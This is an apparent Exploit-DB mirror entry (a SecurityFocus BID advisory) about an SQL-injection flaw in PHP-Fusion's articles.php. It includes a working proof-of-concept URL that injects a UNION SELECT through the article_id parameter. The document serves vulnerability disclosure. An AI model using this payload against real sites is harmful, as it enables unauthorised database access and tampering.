exploit-db-mirror/platforms/php/webapps/35557.txt
Offensive Security a4940a7faa Updated 12_18_2014
2014-12-18 04:50:37 +00:00

7 lines
No EOL
454 B
Text
Executable file

source: http://www.securityfocus.com/bid/47128/info
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/articles.php?article_id=-1+union+select+version()--